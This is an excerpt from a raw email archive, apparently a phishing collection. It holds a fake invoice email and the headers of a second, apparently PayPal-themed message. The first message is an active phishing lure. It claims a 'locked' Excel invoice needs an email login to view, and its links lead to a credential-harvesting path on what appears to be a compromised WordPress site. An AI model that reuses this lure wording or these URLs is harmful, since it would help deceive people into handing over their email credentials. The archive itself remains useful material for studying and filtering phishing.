From: info@erkdental.com
Date: Thu, 12 Mar 2015 14:54:04 -0400
Message-ID: <63370f5717c5510ffabb9e45b10ca859@erkdental.com>
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 42

You will not see this in a MIME-aware mail reader.
--===============1591183124==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

Enclosed is the Invoice in excel file, the file has been locked to you, log=
 in with your email to view
Please check and confirm.

Best regards,
Lina

 1 attachments (total 53.9 KB)
 =

  View slide show (1)  Download=20
--===============1591183124==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<HTML><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Diso-8859-1"/></head><BODY><P><SPAN style=3D"WHITE-SPACE: normal; WORD-SP=
ACING: 0px; TEXT-TRANSFORM: none; FLOAT: none; COLOR: rgb(34,34,34); FONT: =
12px arial, sans-serif; DISPLAY: inline; LETTER-SPACING: normal; BACKGROUND=
-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; -webkit-text-stroke-width: 0px"=
>Enclosed is the Invoice in excel file, the file has been locked to you, lo=
g in with your email to view<BR>Please check and confirm.<BR><BR>Best regar=
ds,<BR>Lina<BR></SPAN></P>
<P>1 attachments (total 53.9 KB)</P>
<P><A href=3D"http://tinfs.com/domini/payment%20page/qcmwp.com/new/wp-admin=
/excel/" target=3D_blank><IMG alt=3Dhttp://tinfs.com/domini/payment%20page/=
qcmwp.com/new/wp-admin/excel/Capture12.JPG src=3D"http://tinfs.com/domini/p=
ayment%20page/qcmwp.com/new/wp-admin/excel/Capture12.JPG" width=3D126 heigh=
t=3D174></A></P>
<DIV style=3D"WHITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none;=
 COLOR: rgb(0,0,0); FONT: 16px 'Helvetica Neue', 'Segoe UI', Helvetica, Ari=
al, 'Lucida Grande', sans-serif; LETTER-SPACING: normal; BACKGROUND-COLOR: =
rgb(255,255,255); TEXT-INDENT: 0px; -webkit-text-stroke-width: 0px; font-st=
retch: normal">
<DIV id=3Dyiv3612970117yui_3_16_0_1_1423427369116_22388 class=3Dyiv36129701=
17><A id=3Dyiv3612970117yui_3_16_0_1_1416180780200_9972 class=3Dyiv36129701=
17 style=3D"TEXT-DECORATION: underline; BACKGROUND: none transparent scroll=
 repeat 0% 0%; COLOR: rgb(25,106,212); OUTLINE-WIDTH: medium; PADDING-BOTTO=
M: 0px; PADDING-TOP: 0px; OUTLINE-STYLE: none; PADDING-LEFT: 0px; MARGIN: 0=
px; OUTLINE-COLOR: invert; PADDING-RIGHT: 0px" href=3D"http://tinfs.com/dom=
ini/payment%20page/qcmwp.com/new/wp-admin/excel/" rel=3Dnofollow target=3D_=
blank>View slide show (1)</A>&nbsp;&nbsp;<A id=3Dyiv3612970117yui_3_16_0_1_=
1416180780200_9969 class=3Dyiv3612970117 style=3D"TEXT-DECORATION: underlin=
e; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: rgb(25,106,212)=
; OUTLINE-WIDTH: medium; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; OUTLINE-STY=
LE: none; PADDING-LEFT: 0px; MARGIN: 0px; OUTLINE-COLOR: invert; PADDING-RI=
GHT: 0px" href=3D"http://tinfs.com/domini/payment%20page/qcmwp.com/new/wp-a=
dmin/excel/" rel=3Dnofollow target=3D_blank>Download</A> </DIV></DIV></BODY=
></HTML>
--===============1591183124==--

From bounces+643921-953b-jose=monkey.org@sendgrid.info  Thu Mar 12 16:22:41 2015
Return-Path: <bounces+643921-953b-jose=monkey.org@sendgrid.info>
X-Original-To: jose@login.monkey.org
Delivered-To: jose@login.monkey.org
Received: from forward.b.hostedemail.com (forward.b.hostedemail.com [64.98.36.17])
	by l.monkey.org (Postfix) with ESMTP id 9C77CF40A2
	for <jose@login.monkey.org>; Thu, 12 Mar 2015 16:22:41 -0500 (CDT)
Received: from smtpin10.hostedemail.com (10.5.19.248.rfc1918.com [10.5.19.248])
	by ofarelay03.b.hostedemail.com (Postfix) with SMTP id 67C5C18412B
	for <jose@login.monkey.org>; Thu, 12 Mar 2015 21:22:41 +0000 (UTC)
X-Forwarded-For: jose@monkey.org by Hostedemail
Delivered-To: jose@monkey.org
X-FDA: 69958166922.10.cart57_347bed4ac5324
Authentication-Results: auth.b.hostedemail.com; dmarc=none header.from=rentja.com
Authentication-Results: auth.b.hostedemail.com; dkim=permerror
	reason="key not found" header.d=rentja.com header.i=@rentja.com
	header.b=o2CXTEY0; dkim-adsp=none (insecure policy);
	dkim-atps=neutral
X-Spam-Summary: 84,7,0,9c33c31fef940c78,d41d8cd98f00b204,bounces+643921-953b-jose=monkey.org@sendgrid.info,:,RULES_HIT:41:72:152:355:379:502:599:967:968:969:973:978:983:988:989:1208:1221:1261:1313:1314:1345:1381:1431:1432:1437:1516:1517:1518:1535:1542:1568:1570:1575:1594:1699:1711:1714:1730:1776:1792:1803:2194:2198:2199:2200:2525:2567:2682:2685:2693:2859:2890:2892:2895:2902:2909:2924:2925:2926:2933:2937:2939:2942:2945:2947:2951:2954:3000:3022:3138:3139:3140:3141:3142:3635:3865:3866:3867:3868:3873:3874:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4362:5007:6653:6684:8518:8550:8568:8957:9025:10012:10214:10400:10471:11639:11641:11658:11914:12043:12295:12438:12519:12555:12667:13019:13035:13139:13236:13255:14096:14129:21080:21094,0,RBL:neutral,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fp,MSBL:0,DNSBL:neutral,Custom_rules:0:3:0
X-HE-Tag: cart57_347bed4ac5324
X-Filterd-Recvd-Size: 5087
Received: from o192254124212.outbound-mail.sendgrid.net (o192254124212.outbound-mail.sendgrid.net [192.254.124.212])
	by imf28.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Thu, 12 Mar 2015 21:22:40 +0000 (UTC)
DKIM-Signature: v=1; a=rsa-sha1; c=relaxed; d=rentja.com; 
	h=content-type:mime-version:from:to:reply-to:subject; s=smtpapi; 
	bh=XlQm5k89bAGImkyUlpodhw4fYSE=; b=o2CXTEY0Jerv0JKU1c1ZwBcQSKNpB
	cQkFOJKACDOz/I4R0n84aHt+GqDGlxcEZ685H9EfaRzPKNSiha2pxEeJ1zU4ux5i
	iMxtAMK1Pv2UfTWf2QfXzAJDOwC1n2JodvKtb8xMbbe3hJ6S5RKNg3UjqTAWa+LO
	keht9tTPyo4B/A=
Received: by filter-147.sjc1.sendgrid.net with SMTP id filter-147.31643.5502039411
        2015-03-12 21:22:28.748237346 +0000 UTC
Received: from NjQzOTIx (unknown [10.42.83.122])
	by ismtpd-042 (SG) with HTTP id 14c0fddfd0c.72c0.3261f5
	for <inc.paypaK@rentja.com>; Thu, 12 Mar 2015 21:22:28 +0000 (UTC)
Content-Type: multipart/alternative;
	boundary="===============0057771162869751176=="
MIME-Version: 1.0
